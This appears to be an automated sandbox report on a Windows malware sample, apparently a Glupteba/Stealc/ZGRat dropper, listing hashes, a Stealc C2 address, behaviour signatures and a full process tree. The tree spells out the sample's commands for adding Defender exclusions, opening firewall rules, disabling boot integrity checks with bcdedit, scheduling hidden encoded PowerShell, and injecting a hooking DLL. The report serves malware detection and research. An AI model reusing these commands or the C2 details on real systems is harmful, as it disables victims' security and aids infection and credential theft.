Analysis
-
max time kernel
152s -
max time network
160s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
-
submitted
18-04-2024 23:04
Errors
General
-
Target
b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe
-
Size
383KB
-
MD5
81f2e982687c695ee0bbadf147feca3b
-
SHA1
b33a15b47c3b99c65f2277562a928bf9ce9dabf7
-
SHA256
b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331
-
SHA512
16461398006e12c7acc47ae87859bc4567405a7fdca2e3d13863cf14b424036c1703d882f30a3e4aa62a2cec9d8c994b6fa823ba8250ec0e6ba35f52ae2ecf05
-
SSDEEP
6144:kz00wubhcFv7g9X7wkDStegoIG2sJnuhLvdHVpHBm/F0kpJVdVpftj7XfLT:kzhBqFv7g9kBVG2ACLvd1pBmN3pJ5plX
Malware Config
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Detect ZGRat V1 3 IoCs
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 9 IoCs
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
Windows security bypass 2 TTPs 48 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 8 IoCs
-
Executes dropped EXE 25 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 14 IoCs
-
Windows security modification 2 TTPs 8 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 31 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 27 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 11 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe"C:\Users\Admin\AppData\Local\Temp\b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Y9YXUx6iCWvGY5j5k7gNWEL3.exe"C:\Users\Admin\Pictures\Y9YXUx6iCWvGY5j5k7gNWEL3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u1ws.0.exe"C:\Users\Admin\AppData\Local\Temp\u1ws.0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exeC:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exeC:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\u1ws.1.exe"C:\Users\Admin\AppData\Local\Temp\u1ws.1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\OZQQi9DRPGWSgr3qMTCvxDe9.exe"C:\Users\Admin\Pictures\OZQQi9DRPGWSgr3qMTCvxDe9.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\OZQQi9DRPGWSgr3qMTCvxDe9.exe"C:\Users\Admin\Pictures\OZQQi9DRPGWSgr3qMTCvxDe9.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Pictures\hPUum8YpSHMcjwOyBWQXXWG5.exe"C:\Users\Admin\Pictures\hPUum8YpSHMcjwOyBWQXXWG5.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\hPUum8YpSHMcjwOyBWQXXWG5.exe"C:\Users\Admin\Pictures\hPUum8YpSHMcjwOyBWQXXWG5.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 07⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 17⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 07⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}7⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe6⤵
- Executes dropped EXE
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\xTeBPgndRm5MJOMJJQRKLAJn.exe"C:\Users\Admin\Pictures\xTeBPgndRm5MJOMJJQRKLAJn.exe"3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Users\Admin\Pictures\UpY6v7SJnmZU4I4dvM7RAcj3.exe"C:\Users\Admin\Pictures\UpY6v7SJnmZU4I4dvM7RAcj3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4FF4.tmp\Install.exe.\Install.exe /sQwdidHh "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 23:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\mcdiLfb.exe\" em /qZsite_idHpV 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\KusxnIZVIgQoElLxS2uKqABG.exe"C:\Users\Admin\Pictures\KusxnIZVIgQoElLxS2uKqABG.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS733D.tmp\Install.exe.\Install.exe /sQwdidHh "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 23:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\EMxFARC.exe\" em /zTsite_idccn 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\owFsHW3QGCbeNXKwxqnYFfPC.exe"C:\Users\Admin\Pictures\owFsHW3QGCbeNXKwxqnYFfPC.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe4⤵
- Executes dropped EXE
-
C:\Windows\system32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"5⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3000 -s 6562⤵
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240418230430.log C:\Windows\Logs\CBS\CbsPersist_20240418230430.cab1⤵
- Drops file in Windows directory
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1439716600254154460-1424716648-1546680021-652035181152040174-771840083-734560363"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "189143027197148276-74952798523862402717667068749279000114396753131705759946"1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\taskeng.exetaskeng.exe {C3D0E305-875F-4822-A921-D661BD86571A} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\EMxFARC.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\EMxFARC.exe em /zTsite_idccn 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gErYaxytP" /SC once /ST 10:35:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gErYaxytP"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gErYaxytP"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\ofqvFcNvzeRditbz\ulmIyAZK\PzsQyfJlLgRRIDaQ.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\ofqvFcNvzeRditbz\ulmIyAZK\PzsQyfJlLgRRIDaQ.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
